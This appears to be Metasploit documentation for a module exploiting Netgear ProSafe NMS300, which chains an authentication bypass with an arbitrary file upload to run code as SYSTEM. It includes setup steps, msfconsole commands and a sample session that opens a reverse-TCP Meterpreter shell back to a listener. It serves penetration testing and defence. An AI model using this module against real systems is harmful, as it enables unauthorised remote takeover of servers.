2.0 KiB
Vulnerable Application
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has multiple vulnerabilities that can allow an unauthenticated remote
attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
SQL injection, arbitrary file upload, and privilege escalation across various versions.
This module is able to spawn a meterpreter session by chaining together two specific
vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.7.0.12, and 1.7.0.1.
Note: Module should also work against version 1.1.0.13 but it wasn't tested.
Testing
For installing the vulnerable version follow the steps below,
- Download the installer for versions below v1.7.0.22.
- Follow installation steps.
After these steps the ProSAFE NMS web panel will be exposed on the http://localhost:8080/ address.
Verification Steps
- msfconsole
- Do:
use exploit/windows/http/netgear_nms_rce - Do:
set RHOST [IP] - Do:
set RPORT [PORT] - Do:
exploit
Options
Scenarios
msf6 > use exploit/windows/http/netgear_nms_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(windows/http/netgear_nms_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.104:8080 - Uploading payload...
[+] 192.168.56.104:8080 - Payload uploaded successfully
[*] 192.168.56.104:8080 - Executing payload...
[*] Sending stage (175686 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >